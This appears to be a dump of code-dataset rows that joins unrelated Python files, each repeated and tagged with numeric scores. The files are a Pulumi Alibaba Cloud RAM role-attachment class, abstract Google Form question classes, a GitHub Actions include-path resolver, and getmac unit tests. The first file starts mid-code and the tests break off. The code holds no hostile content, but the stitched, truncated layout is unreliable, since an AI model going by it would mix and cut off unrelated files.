vpc_name=name,
cidr_block="172.16.0.0/16")
default_switch = alicloud.vpc.Switch("defaultSwitch",
vpc_id=default_network.id,
cidr_block="172.16.0.0/24",
zone_id=default_zones.zones[0].id)
default_security_group = alicloud.ecs.SecurityGroup("defaultSecurityGroup", vpc_id=default_network.id)
default_security_group_rule = alicloud.ecs.SecurityGroupRule("defaultSecurityGroupRule",
type="ingress",
ip_protocol="tcp",
nic_type="intranet",
policy="accept",
port_range="22/22",
priority=1,
security_group_id=default_security_group.id,
cidr_ip="172.16.0.0/24")
foo = alicloud.ecs.Instance("foo",
vswitch_id=default_switch.id,
image_id=default_images.images[0].id,
instance_type=default_instance_types.instance_types[0].id,
system_disk_category="cloud_efficiency",
internet_charge_type="PayByTraffic",
internet_max_bandwidth_out=5,
security_groups=[default_security_group.id],
instance_name=name)
role = alicloud.ram.Role("role",
document=\"\"\" {
"Statement": [
{
"Action": "sts:AssumeRole",
"Effect": "Allow",
"Principal": {
"Service": [
"ecs.aliyuncs.com"
]
}
}
],
"Version": "1"
}
\"\"\",
description="this is a test",
force=True)
attach = alicloud.ram.RoleAttachment("attach",
role_name=role.name,
instance_ids=[__item.id for __item in [foo]])
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] instance_ids: The list of ECS instance's IDs.
:param pulumi.Input[str] role_name: The name of role used to bind. This name can have a string of 1 to 64 characters, must contain only alphanumeric characters or hyphens, such as "-", "_", and must not begin with a hyphen.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: RoleAttachmentArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides a RAM role attachment resource to bind role for several ECS instances.
## Example Usage
```python
import pulumi
import pulumi_alicloud as alicloud
default_zones = alicloud.get_zones(available_disk_category="cloud_efficiency",
available_resource_creation="VSwitch")
default_instance_types = alicloud.ecs.get_instance_types(availability_zone=default_zones.zones[0].id,
cpu_core_count=2,
memory_size=4)
default_images = alicloud.ecs.get_images(name_regex="^ubuntu_18.*64",
most_recent=True,
owners="system")
config = pulumi.Config()
name = config.get("name")
if name is None:
name = "ecsInstanceVPCExample"
default_network = alicloud.vpc.Network("defaultNetwork",
vpc_name=name,
cidr_block="172.16.0.0/16")
default_switch = alicloud.vpc.Switch("defaultSwitch",
vpc_id=default_network.id,
cidr_block="172.16.0.0/24",
zone_id=default_zones.zones[0].id)
default_security_group = alicloud.ecs.SecurityGroup("defaultSecurityGroup", vpc_id=default_network.id)
default_security_group_rule = alicloud.ecs.SecurityGroupRule("defaultSecurityGroupRule",
type="ingress",
ip_protocol="tcp",
nic_type="intranet",
policy="accept",
port_range="22/22",
priority=1,
security_group_id=default_security_group.id,
cidr_ip="172.16.0.0/24")
foo = alicloud.ecs.Instance("foo",
vswitch_id=default_switch.id,
image_id=default_images.images[0].id,
instance_type=default_instance_types.instance_types[0].id,
system_disk_category="cloud_efficiency",
internet_charge_type="PayByTraffic",
internet_max_bandwidth_out=5,
security_groups=[default_security_group.id],
instance_name=name)
role = alicloud.ram.Role("role",
document=\"\"\" {
"Statement": [
{
"Action": "sts:AssumeRole",
"Effect": "Allow",
"Principal": {
"Service": [
"ecs.aliyuncs.com"
]
}
}
],
"Version": "1"
}
\"\"\",
description="this is a test",
force=True)
attach = alicloud.ram.RoleAttachment("attach",
role_name=role.name,
instance_ids=[__item.id for __item in [foo]])
```
:param str resource_name: The name of the resource.
:param RoleAttachmentArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(RoleAttachmentArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
instance_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
role_name: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = RoleAttachmentArgs.__new__(RoleAttachmentArgs)
if instance_ids is None and not opts.urn:
raise TypeError("Missing required property 'instance_ids'")
__props__.__dict__["instance_ids"] = instance_ids
if role_name is None and not opts.urn:
raise TypeError("Missing required property 'role_name'")
__props__.__dict__["role_name"] = role_name
super(RoleAttachment, __self__).__init__(
'alicloud:ram/roleAttachment:RoleAttachment',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
instance_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
role_name: Optional[pulumi.Input[str]] = None) -> 'RoleAttachment':
"""
Get an existing RoleAttachment resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] instance_ids: The list of ECS instance's IDs.
:param pulumi.Input[str] role_name: The name of role used to bind. This name can have a string of 1 to 64 characters, must contain only alphanumeric characters or hyphens, such as "-", "_", and must not begin with a hyphen.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _RoleAttachmentState.__new__(_RoleAttachmentState)
__props__.__dict__["instance_ids"] = instance_ids
__props__.__dict__["role_name"] = role_name
return RoleAttachment(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="instanceIds")
def instance_ids(self) -> pulumi.Output[Sequence[str]]:
"""
The list of ECS instance's IDs.
"""
return pulumi.get(self, "instance_ids")
@property
@pulumi.getter(name="roleName")
def role_name(self) -> pulumi.Output[str]:
"""
The name of role used to bind. This name can have a string of 1 to 64 characters, must contain only alphanumeric characters or hyphens, such as "-", "_", and must not begin with a hyphen.
"""
return pulumi.get(self, "role_name") | 0.812533 | 0.136464 |
from abc import ABC, abstractmethod
from selenium.webdriver.remote.webelement import WebElement
from typing import Any, Optional, Tuple
class AbstractQuestion(ABC):
"""AbstractQuestion class as ABC for custom Google Form question classes."""
# region Getter methods
@abstractmethod
def _get_question_element(self) -> Optional[WebElement]:
"""Gets the web element which represents the entire question."""
pass
@abstractmethod
def get_header(self) -> Optional[str]:
"""Gets the question header."""
pass
@abstractmethod
def get_description(self) -> Optional[str]:
"""Gets the question description."""
pass
@abstractmethod
def is_required(self) -> Optional[bool]:
"""Checks if the question is required."""
pass
@abstractmethod
def get_answer_elements(self) -> Any:
"""Gets the web elements related to answering of the question."""
pass
# endregion Getter methods
# region Setter methods
@abstractmethod
def _set_header(self, header: str) -> None:
"""Sets the question header."""
pass
@abstractmethod
def set_question_element(self, element: WebElement) -> None:
"""Sets the web element representing the entire question if it has changed."""
pass
@abstractmethod
def set_answer_elements(self, *args, **kwargs) -> None:
"""Sets the web elements required for answering the question if it has changed."""
pass
@abstractmethod
def set_description(self, description: str) -> None:
"""Sets the question description if it has changed."""
pass
@abstractmethod
def set_required(self, required: bool) -> None:
"""Toggles the required flag if it has changed."""
pass
# endregion Setter methods
@abstractmethod
def _is_valid(self, *elements: WebElement) -> bool:
"""Check if the web element(s) is/are still valid."""
pass
@abstractmethod
def get_info(self) -> Optional[bool]:
"""Obtains question metadata from Google Form."""
pass
@abstractmethod
def answer(self, *args, **kwargs) -> Optional[bool]:
"""Provide instruction to answer the question."""
pass
class AbstractOptionQuestion(ABC):
"""AbstractOptionQuestion class as ABC for custom Google Form question classes which offer options."""
# region Getter methods
@abstractmethod
def get_options(self) -> Optional[Tuple[str, ...]]:
"""Gets a list of all possible options."""
pass
@abstractmethod
def get_other_option_element(self) -> Optional[WebElement]:
"""Gets the web element for the other option input field."""
pass
# endregion Getter methods
# region Setter methods
@abstractmethod
def _set_options(self, *options: str) -> None:
"""Sets the list of options provided if it has changed."""
pass
@abstractmethod
def set_other_option_element(self, element: WebElement) -> None:
"""Sets the other option element if it has changed."""
pass
# endregion Setter methods
@abstractmethod
def _is_option(self, option: str) -> bool:
"""Check if the option is specified."""
pass
@abstractmethod
def _has_other_option(self) -> bool:
"""Check if there is an 'Other' option specified."""
pass
if __name__ == '__main__':
pass | src/questions/abstract.py | from abc import ABC, abstractmethod
from selenium.webdriver.remote.webelement import WebElement
from typing import Any, Optional, Tuple
class AbstractQuestion(ABC):
"""AbstractQuestion class as ABC for custom Google Form question classes."""
# region Getter methods
@abstractmethod
def _get_question_element(self) -> Optional[WebElement]:
"""Gets the web element which represents the entire question."""
pass
@abstractmethod
def get_header(self) -> Optional[str]:
"""Gets the question header."""
pass
@abstractmethod
def get_description(self) -> Optional[str]:
"""Gets the question description."""
pass
@abstractmethod
def is_required(self) -> Optional[bool]:
"""Checks if the question is required."""
pass
@abstractmethod
def get_answer_elements(self) -> Any:
"""Gets the web elements related to answering of the question."""
pass
# endregion Getter methods
# region Setter methods
@abstractmethod
def _set_header(self, header: str) -> None:
"""Sets the question header."""
pass
@abstractmethod
def set_question_element(self, element: WebElement) -> None:
"""Sets the web element representing the entire question if it has changed."""
pass
@abstractmethod
def set_answer_elements(self, *args, **kwargs) -> None:
"""Sets the web elements required for answering the question if it has changed."""
pass
@abstractmethod
def set_description(self, description: str) -> None:
"""Sets the question description if it has changed."""
pass
@abstractmethod
def set_required(self, required: bool) -> None:
"""Toggles the required flag if it has changed."""
pass
# endregion Setter methods
@abstractmethod
def _is_valid(self, *elements: WebElement) -> bool:
"""Check if the web element(s) is/are still valid."""
pass
@abstractmethod
def get_info(self) -> Optional[bool]:
"""Obtains question metadata from Google Form."""
pass
@abstractmethod
def answer(self, *args, **kwargs) -> Optional[bool]:
"""Provide instruction to answer the question."""
pass
class AbstractOptionQuestion(ABC):
"""AbstractOptionQuestion class as ABC for custom Google Form question classes which offer options."""
# region Getter methods
@abstractmethod
def get_options(self) -> Optional[Tuple[str, ...]]:
"""Gets a list of all possible options."""
pass
@abstractmethod
def get_other_option_element(self) -> Optional[WebElement]:
"""Gets the web element for the other option input field."""
pass
# endregion Getter methods
# region Setter methods
@abstractmethod
def _set_options(self, *options: str) -> None:
"""Sets the list of options provided if it has changed."""
pass
@abstractmethod
def set_other_option_element(self, element: WebElement) -> None:
"""Sets the other option element if it has changed."""
pass
# endregion Setter methods
@abstractmethod
def _is_option(self, option: str) -> bool:
"""Check if the option is specified."""
pass
@abstractmethod
def _has_other_option(self) -> bool:
"""Check if there is an 'Other' option specified."""
pass
if __name__ == '__main__':
pass | 0.934724 | 0.395251 |
import os.path
import pathlib
import urllib
import urllib.request
from collections import namedtuple
from .output import printerr, printdbg
"""
Functions for dealing with files that could either be local on disk or on in a
remote GitHub repository.
"""
class FilePath:
pass
_LocalFilePath = namedtuple('LocalFilePath', 'repo_root path')
class LocalFilePath(_LocalFilePath, FilePath):
def __new__(cls, repo_root, path):
if isinstance(repo_root, str):
repo_root = pathlib.Path(repo_root)
if isinstance(path, str):
path = pathlib.Path(path)
return super().__new__(cls, repo_root, path)
def __str__(self):
return os.path.join(self.repo_root, self.path)
_RemoteFilePath = namedtuple('RemoteFilePath', 'user repo ref path')
class RemoteFilePath(_RemoteFilePath, FilePath):
def __str__(self):
return '{user}/{repo}/{path}@{ref}'.format(
user=self.user, repo=self.repo, path=self.path, ref=self.ref)
def parse_remote_path(action_name):
"""Convert action name into a FilePath object."""
assert not action_name.startswith('docker://'), action_name
if '@' not in action_name:
action_name = action_name + '@main'
repo_plus_path, ref = action_name.split('@', 1)
assert '@' not in ref, action_name
if repo_plus_path.count('/') == 1:
repo_plus_path += '/'
user, repo, path = repo_plus_path.split('/', 2)
return RemoteFilePath(user, repo, ref, path)
def get_filepath(current, filepath, filetype=None):
"""
>>> localfile_current = LocalFilePath(pathlib.Path('/path'), 'abc.yaml')
>>> remotefile_current = RemoteFilePath('user', 'repo', 'ref', 'abc.yaml')
Local path on local current becomes a local path.
>>> fp = get_filepath(localfile_current, './.github/actions/blah')
>>> fp
LocalFilePath(repo_root=PosixPath('/path'), path=PosixPath('.github/actions/blah'))
>>> str(fp)
'/path/.github/actions/blah'
>>> fp = get_filepath(localfile_current, '/blah', 'action')
>>> fp
LocalFilePath(repo_root=PosixPath('/path'), path=PosixPath('.github/includes/actions/blah'))
>>> str(fp)
'/path/.github/includes/actions/blah'
>>> fp = get_filepath(localfile_current, '/blah', 'workflow')
>>> fp
LocalFilePath(repo_root=PosixPath('/path'), path=PosixPath('.github/includes/workflows/blah'))
>>> str(fp)
'/path/.github/includes/workflows/blah'
Local path on current remote gets converted to a remote path.
>>> fp = get_filepath(remotefile_current, './.github/actions/blah')
>>> fp
RemoteFilePath(user='user', repo='repo', ref='ref', path='.github/actions/blah')
>>> str(fp)
'user/repo/.github/actions/blah@ref'
>>> fp = get_filepath(remotefile_current, '/blah', 'workflow')
>>> fp
RemoteFilePath(user='user', repo='repo', ref='ref', path='.github/includes/workflows/blah')
>>> str(fp)
'user/repo/.github/includes/workflows/blah@ref'
"""
# Resolve '/$XXX' to './.github/actions/$XXX'
assert isinstance(filepath, str), (type(filepath), filepath)
if filepath.startswith('/'):
assert filetype is not None, (current, filepath, filetype)
filepath = '/'.join(
['.', '.github', 'includes', filetype+'s', filepath[1:]])
if filepath.startswith('./'):
assert '@' not in filepath, (
"Local name {} shouldn't have an @ in it".format(filepath))
# If new is local but current is remote, rewrite to a remote.
if isinstance(current, RemoteFilePath) and filepath.startswith('./'):
old_filepath = filepath
new_action = current._replace(path=filepath[2:])
filepath = '{user}/{repo}/{path}@{ref}'.format(**new_action._asdict())
printerr('Rewrite local action {} in remote repo {} to: {}'.format(
old_filepath, current, filepath))
# Local file
if filepath.startswith('./'):
assert isinstance(current, LocalFilePath), (current, filepath)
localpath = (current.repo_root / filepath[2:]).resolve()
repopath = localpath.relative_to(current.repo_root)
return current._replace(path=repopath)
# Remote file
else:
return parse_remote_path(filepath)
DOWNLOAD_CACHE = {}
def get_filepath_data(filepath):
# Get local data
if isinstance(filepath, LocalFilePath):
filename = filepath.repo_root / filepath.path
if not filename.exists():
return IOError('{} does not exist'.format(filename))
with open(filename) as f:
return f.read()
# Download remote data
elif isinstance(filepath, RemoteFilePath):
if filepath not in DOWNLOAD_CACHE:
url = 'https://raw.githubusercontent.com/{user}/{repo}/{ref}/{path}'.format(
**filepath._asdict())
printerr("Trying to download {} ..".format(url), end=' ')
try:
yaml_data = urllib.request.urlopen(url).read().decode('utf-8')
printerr('Success!')
except urllib.error.URLError as e:
yaml_data = e
printerr('Failed ({})!'.format(e))
DOWNLOAD_CACHE[filepath] = yaml_data
return DOWNLOAD_CACHE[filepath]
else:
assert False | actions_includes/files.py |
import os.path
import pathlib
import urllib
import urllib.request
from collections import namedtuple
from .output import printerr, printdbg
"""
Functions for dealing with files that could either be local on disk or on in a
remote GitHub repository.
"""
class FilePath:
pass
_LocalFilePath = namedtuple('LocalFilePath', 'repo_root path')
class LocalFilePath(_LocalFilePath, FilePath):
def __new__(cls, repo_root, path):
if isinstance(repo_root, str):
repo_root = pathlib.Path(repo_root)
if isinstance(path, str):
path = pathlib.Path(path)
return super().__new__(cls, repo_root, path)
def __str__(self):
return os.path.join(self.repo_root, self.path)
_RemoteFilePath = namedtuple('RemoteFilePath', 'user repo ref path')
class RemoteFilePath(_RemoteFilePath, FilePath):
def __str__(self):
return '{user}/{repo}/{path}@{ref}'.format(
user=self.user, repo=self.repo, path=self.path, ref=self.ref)
def parse_remote_path(action_name):
"""Convert action name into a FilePath object."""
assert not action_name.startswith('docker://'), action_name
if '@' not in action_name:
action_name = action_name + '@main'
repo_plus_path, ref = action_name.split('@', 1)
assert '@' not in ref, action_name
if repo_plus_path.count('/') == 1:
repo_plus_path += '/'
user, repo, path = repo_plus_path.split('/', 2)
return RemoteFilePath(user, repo, ref, path)
def get_filepath(current, filepath, filetype=None):
"""
>>> localfile_current = LocalFilePath(pathlib.Path('/path'), 'abc.yaml')
>>> remotefile_current = RemoteFilePath('user', 'repo', 'ref', 'abc.yaml')
Local path on local current becomes a local path.
>>> fp = get_filepath(localfile_current, './.github/actions/blah')
>>> fp
LocalFilePath(repo_root=PosixPath('/path'), path=PosixPath('.github/actions/blah'))
>>> str(fp)
'/path/.github/actions/blah'
>>> fp = get_filepath(localfile_current, '/blah', 'action')
>>> fp
LocalFilePath(repo_root=PosixPath('/path'), path=PosixPath('.github/includes/actions/blah'))
>>> str(fp)
'/path/.github/includes/actions/blah'
>>> fp = get_filepath(localfile_current, '/blah', 'workflow')
>>> fp
LocalFilePath(repo_root=PosixPath('/path'), path=PosixPath('.github/includes/workflows/blah'))
>>> str(fp)
'/path/.github/includes/workflows/blah'
Local path on current remote gets converted to a remote path.
>>> fp = get_filepath(remotefile_current, './.github/actions/blah')
>>> fp
RemoteFilePath(user='user', repo='repo', ref='ref', path='.github/actions/blah')
>>> str(fp)
'user/repo/.github/actions/blah@ref'
>>> fp = get_filepath(remotefile_current, '/blah', 'workflow')
>>> fp
RemoteFilePath(user='user', repo='repo', ref='ref', path='.github/includes/workflows/blah')
>>> str(fp)
'user/repo/.github/includes/workflows/blah@ref'
"""
# Resolve '/$XXX' to './.github/actions/$XXX'
assert isinstance(filepath, str), (type(filepath), filepath)
if filepath.startswith('/'):
assert filetype is not None, (current, filepath, filetype)
filepath = '/'.join(
['.', '.github', 'includes', filetype+'s', filepath[1:]])
if filepath.startswith('./'):
assert '@' not in filepath, (
"Local name {} shouldn't have an @ in it".format(filepath))
# If new is local but current is remote, rewrite to a remote.
if isinstance(current, RemoteFilePath) and filepath.startswith('./'):
old_filepath = filepath
new_action = current._replace(path=filepath[2:])
filepath = '{user}/{repo}/{path}@{ref}'.format(**new_action._asdict())
printerr('Rewrite local action {} in remote repo {} to: {}'.format(
old_filepath, current, filepath))
# Local file
if filepath.startswith('./'):
assert isinstance(current, LocalFilePath), (current, filepath)
localpath = (current.repo_root / filepath[2:]).resolve()
repopath = localpath.relative_to(current.repo_root)
return current._replace(path=repopath)
# Remote file
else:
return parse_remote_path(filepath)
DOWNLOAD_CACHE = {}
def get_filepath_data(filepath):
# Get local data
if isinstance(filepath, LocalFilePath):
filename = filepath.repo_root / filepath.path
if not filename.exists():
return IOError('{} does not exist'.format(filename))
with open(filename) as f:
return f.read()
# Download remote data
elif isinstance(filepath, RemoteFilePath):
if filepath not in DOWNLOAD_CACHE:
url = 'https://raw.githubusercontent.com/{user}/{repo}/{ref}/{path}'.format(
**filepath._asdict())
printerr("Trying to download {} ..".format(url), end=' ')
try:
yaml_data = urllib.request.urlopen(url).read().decode('utf-8')
printerr('Success!')
except urllib.error.URLError as e:
yaml_data = e
printerr('Failed ({})!'.format(e))
DOWNLOAD_CACHE[filepath] = yaml_data
return DOWNLOAD_CACHE[filepath]
else:
assert False | 0.517083 | 0.129183 |
# http://multivax.com/last_question.html
"""Unit and functional tests for getmac."""
import unittest
import getmac
import io
import re
from os import path
try:
from unittest import mock
except ImportError:
import mock
getmac.DEBUG = True
class MockHelper(object):
@classmethod
def load_sample(cls, filename):
filename = path.realpath('%s/../samples/%s' % (path.dirname(__file__), filename))
content = ''
with io.open(filename, 'rt', newline='') as f:
content = f.read()
return content
def __init__(self, platform_name, cmd, sample):
self.platform_name = platform_name
self.cmd = cmd
self.sample = sample
def create_side_effect(self, regex, sample):
def side_effect(params, *args, **kwargs):
output = None
retcode = 0
params = ' '.join(params) if isinstance(params, list) else params
if re.search(regex, params):
output = self.load_sample(sample)
else:
retcode = 1
process_mock = mock.Mock()
process_attrs = {
'communicate.return_value': (output, None),
'poll.return_value': retcode
}
process_mock.configure_mock(**process_attrs)
return process_mock
return side_effect
def __call__(self, func):
def func_wrapper(obj, mock_popen, mock_platform, mock_socket, *args):
if self.platform_name == 'Windows':
getmac.getmac.IS_WINDOWS = True
getmac.getmac._SYST = self.platform_name
mock_popen.side_effect = self.create_side_effect(self.cmd, self.sample)
platform_mock = mock.Mock()
platform_attrs = {
'system.return_value': self.platform_name
}
platform_mock.configure_mock(**platform_attrs)
mock_platform.return_value = platform_mock
socket_mock = mock.Mock()
mock_socket.return_value = socket_mock
func(obj)
return func_wrapper
def mock_helper(platform_name, cmd, sample):
return MockHelper(platform_name, cmd, sample)
@mock.patch('getmac.getmac.socket.socket')
@mock.patch('getmac.getmac.platform')
@mock.patch('getmac.getmac.Popen')
class TestSamples(unittest.TestCase):
# Generic samples
@mock_helper('Linux', r'ifconfig$', 'ifconfig.out')
def test_ifconfig(self):
mac = getmac.get_mac_address(interface='eth0')
self.assertEqual('74:d4:35:e9:45:71', mac)
@mock_helper('Linux', 'ip link', 'ip_link_list.out')
def test_ip_link_list(self):
mac = getmac.get_mac_address(interface='eth0')
self.assertEqual('74:d4:35:e9:45:71', mac)
# OSX samples
@mock_helper('Darwin', 'ifconfig', 'OSX/ifconfig.out')
def test_osx_ifconfig(self):
mac = getmac.get_mac_address(interface='en0')
self.assertEqual('2c:f0:ee:2f:c7:de', mac)
@mock_helper('Darwin', r'arp -a$', 'OSX/arp_-a.out')
def test_osx_arp_a(self):
mac = getmac.get_mac_address(ip='192.168.1.1')
self.assertEqual('58:6d:8f:07:c9:94', mac)
@mock_helper('Darwin', r'arp -an?$', 'OSX/arp_-an.out')
def test_osx_arp_an(self):
mac = getmac.get_mac_address(ip='192.168.1.1')
self.assertEqual('58:6d:8f:07:c9:94', mac)
# Windows samples
@mock_helper('Windows', 'getmac.exe', 'windows_10/getmac.out')
def test_windows_getmac(self):
mac = getmac.get_mac_address(interface='Ethernet 2')
self.assertEqual('74:d4:35:e9:45:71', mac)
@mock_helper('Windows', 'ipconfig.exe /all', 'windows_10/ipconfig-all.out')
def test_windows_ipconfig_all(self):
mac = getmac.get_mac_address(interface='Ethernet 3')
self.assertEqual('74:d4:35:e9:45:71', mac)
@mock_helper('Windows', 'wmic.exe nic', 'windows_10/wmic_nic.out')
def test_windows_wmic_nic(self):
mac = getmac.get_mac_address(interface='Ethernet 3')
self.assertEqual('00:ff:17:15:f8:c8', mac)
# Linux samples
@mock_helper('Linux', 'arp -a', 'ubuntu_18.04/arp_-a.out')
def test_linux_arp_a(self):
mac = getmac.get_mac_address(ip='192.168.16.2')
self.assertEqual('00:50:56:f1:4c:50', mac)
@mock_helper('Linux', 'arp -an', 'ubuntu_18.04/arp_-an.out')
def test_linux_arp_an(self):
mac = getmac.get_mac_address(ip='192.168.16.2')
self.assertEqual('00:50:56:f1:4c:50', mac)
@mock_helper('Linux', 'cat /proc/net/arp', 'ubuntu_18.04/cat_proc-net-arp.out')
def test_linux_cat_proc_net_arp(self):
mac = getmac.get_mac_address(ip='192.168.16.2')
self.assertEqual('00:50:56:f1:4c:50', mac)
@mock_helper('Linux', r'ifconfig ens33$', 'ubuntu_18.04/ifconfig_ens33.out')
def test_linux_ifconfig_ens33(self):
mac = getmac.get_mac_address(interface='ens33')
self.assertEqual('00:0c:29:b5:72:37', mac)
@mock_helper('Linux', r'ifconfig$', 'ubuntu_18.04/ifconfig.out')
def test_linux_ifconfig(self):
mac = getmac.get_mac_address(interface='ens33')
self.assertEqual('00:0c:29:b5:72:37', mac)
@mock_helper('Linux', 'ip link', 'ubuntu_18.04/ip_link_list.out')
def test_linux_ip_link_list(self):
mac = getmac.get_mac_address(interface='ens33')
self.assertEqual('00:0c:29:b5:72:37', mac)
@mock_helper('Linux', 'ip link', 'ubuntu_18.04/ip_link.out')
def test_linux_ip_link(self):
mac = getmac.get_mac_address(interface='ens33')
self.assertEqual('00:0c:29:b5:72:37', mac)
@mock_helper('Linux', r'ip neighbor show 192.168.16.2$',
'ubuntu_18.04/ip_neighbor_show_192-168-16-2.out')
def test_linux_ip_neighbor_show_192_168_16_2(self):
mac = getmac.get_mac_address(ip='192.168.16.2')
self.assertEqual('00:50:56:f1:4c:50', mac)
@unittest.skip('No parser for `ip neighbor show`')
@mock_helper('Linux', r'ip neighbor show$', 'ubuntu_18.04/ip_neighbor_show.out')
def test_linux_ip_neighbor_show(self):
mac = getmac.get_mac_address(ip='192.168.16.2')
self.assertEqual('00:50:56:f1:4c:50', mac)
@mock_helper('Linux', 'netstat -iae', 'ubuntu_18.04/netstat_iae.out')
def test_linux_netstat_iae(self):
mac = getmac.get_mac_address(interface='ens33')
self.assertEqual('00:0c:29:b5:72:37', mac)
class TestGetMacAddress(unittest.TestCase):
def test_get_mac_address_ip_localhost(self):
result = getmac.get_mac_address(ip='127.0.0.1')
self.assertIsNotNone(result)
class TestFailures(unittest.TestCase):
def test_iface_ip(self):
pass
class TestInternalMethods(unittest.TestCase):
pass
class TestThirdPartyPackages(unittest.TestCase):
pass
if __name__ == '__main__':
unittest.main() | tests/test_getmac.py |
# http://multivax.com/last_question.html
"""Unit and functional tests for getmac."""
import unittest
import getmac
import io
import re
from os import path
try:
from unittest import mock
except ImportError:
import mock
getmac.DEBUG = True
class MockHelper(object):
@classmethod
def load_sample(cls, filename):
filename = path.realpath('%s/../samples/%s' % (path.dirname(__file__), filename))
content = ''
with io.open(filename, 'rt', newline='') as f:
content = f.read()
return content
def __init__(self, platform_name, cmd, sample):
self.platform_name = platform_name
self.cmd = cmd
self.sample = sample
def create_side_effect(self, regex, sample):
def side_effect(params, *args, **kwargs):
output = None
retcode = 0
params = ' '.join(params) if isinstance(params, list) else params
if re.search(regex, params):
output = self.load_sample(sample)
else:
retcode = 1
process_mock = mock.Mock()
process_attrs = {
'communicate.return_value': (output, None),
'poll.return_value': retcode
}
process_mock.configure_mock(**process_attrs)
return process_mock
return side_effect
def __call__(self, func):
def func_wrapper(obj, mock_popen, mock_platform, mock_socket, *args):
if self.platform_name == 'Windows':
getmac.getmac.IS_WINDOWS = True
getmac.getmac._SYST = self.platform_name
mock_popen.side_effect = self.create_side_effect(self.cmd, self.sample)
platform_mock = mock.Mock()
platform_attrs = {
'system.return_value': self.platform_name
}
platform_mock.configure_mock(**platform_attrs)
mock_platform.return_value = platform_mock
socket_mock = mock.Mock()
mock_socket.return_value = socket_mock
func(obj)
return func_wrapper
def mock_helper(platform_name, cmd, sample):
return MockHelper(platform_name, cmd, sample)
@mock.patch('getmac.getmac.socket.socket')
@mock.patch('getmac.getmac.platform')
@mock.patch('getmac.getmac.Popen')
class TestSamples(unittest.TestCase):
# Generic samples
@mock_helper('Linux', r'ifconfig$', 'ifconfig.out')
def test_ifconfig(self):
mac = getmac.get_mac_address(interface='eth0')
self.assertEqual('74:d4:35:e9:45:71', mac)
@mock_helper('Linux', 'ip link', 'ip_link_list.out')
def test_ip_link_list(self):
mac = getmac.get_mac_address(interface='eth0')
self.assertEqual('74:d4:35:e9:45:71', mac)
# OSX samples
@mock_helper('Darwin', 'ifconfig', 'OSX/ifconfig.out')
def test_osx_ifconfig(self):
mac = getmac.get_mac_address(interface='en0')
self.assertEqual('2c:f0:ee:2f:c7:de', mac)
@mock_helper('Darwin', r'arp -a$', 'OSX/arp_-a.out')
def test_osx_arp_a(self):
mac = getmac.get_mac_address(ip='192.168.1.1')
self.assertEqual('58:6d:8f:07:c9:94', mac)
@mock_helper('Darwin', r'arp -an?$', 'OSX/arp_-an.out')
def test_osx_arp_an(self):
mac = getmac.get_mac_address(ip='192.168.1.1')
self.assertEqual('58:6d:8f:07:c9:94', mac)
# Windows samples
@mock_helper('Windows', 'getmac.exe', 'windows_10/getmac.out')
def test_windows_getmac(self):
mac = getmac.get_mac_address(interface='Ethernet 2')
self.assertEqual('74:d4:35:e9:45:71', mac)
@mock_helper('Windows', 'ipconfig.exe /all', 'windows_10/ipconfig-all.out')
def test_windows_ipconfig_all(self):
mac = getmac.get_mac_address(interface='Ethernet 3')
self.assertEqual('74:d4:35:e9:45:71', mac)
@mock_helper('Windows', 'wmic.exe nic', 'windows_10/wmic_nic.out')
def test_windows_wmic_nic(self):
mac = getmac.get_mac_address(interface='Ethernet 3')
self.assertEqual('00:ff:17:15:f8:c8', mac)
# Linux samples
@mock_helper('Linux', 'arp -a', 'ubuntu_18.04/arp_-a.out')
def test_linux_arp_a(self):
mac = getmac.get_mac_address(ip='192.168.16.2')
self.assertEqual('00:50:56:f1:4c:50', mac)
@mock_helper('Linux', 'arp -an', 'ubuntu_18.04/arp_-an.out')
def test_linux_arp_an(self):
mac = getmac.get_mac_address(ip='192.168.16.2')
self.assertEqual('00:50:56:f1:4c:50', mac)
@mock_helper('Linux', 'cat /proc/net/arp', 'ubuntu_18.04/cat_proc-net-arp.out')
def test_linux_cat_proc_net_arp(self):
mac = getmac.get_mac_address(ip='192.168.16.2')
self.assertEqual('00:50:56:f1:4c:50', mac)
@mock_helper('Linux', r'ifconfig ens33$', 'ubuntu_18.04/ifconfig_ens33.out')
def test_linux_ifconfig_ens33(self):
mac = getmac.get_mac_address(interface='ens33')
self.assertEqual('00:0c:29:b5:72:37', mac)
@mock_helper('Linux', r'ifconfig$', 'ubuntu_18.04/ifconfig.out')
def test_linux_ifconfig(self):
mac = getmac.get_mac_address(interface='ens33')
self.assertEqual('00:0c:29:b5:72:37', mac)
@mock_helper('Linux', 'ip link', 'ubuntu_18.04/ip_link_list.out')
def test_linux_ip_link_list(self):
mac = getmac.get_mac_address(interface='ens33')
self.assertEqual('00:0c:29:b5:72:37', mac)
@mock_helper('Linux', 'ip link', 'ubuntu_18.04/ip_link.out')
def test_linux_ip_link(self):
mac = getmac.get_mac_address(interface='ens33')
self.assertEqual('00:0c:29:b5:72:37', mac)
